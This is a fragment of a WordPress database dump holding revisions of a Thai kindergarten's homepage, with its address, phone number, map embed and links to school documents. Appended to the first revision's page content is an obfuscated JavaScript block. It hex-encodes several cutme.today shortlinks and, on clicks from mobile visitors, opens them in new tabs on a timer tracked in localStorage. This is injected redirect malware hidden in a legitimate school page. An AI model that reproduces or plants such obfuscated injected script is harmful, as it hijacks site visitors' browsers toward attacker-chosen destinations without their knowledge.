{\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 08:54:14','2024-08-30 01:54:14','',19,'http://watprato.ssk.in.th/?p=278',0,'revision','',0),
(279,2,'2024-08-30 08:55:00','2024-08-30 01:55:00','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group 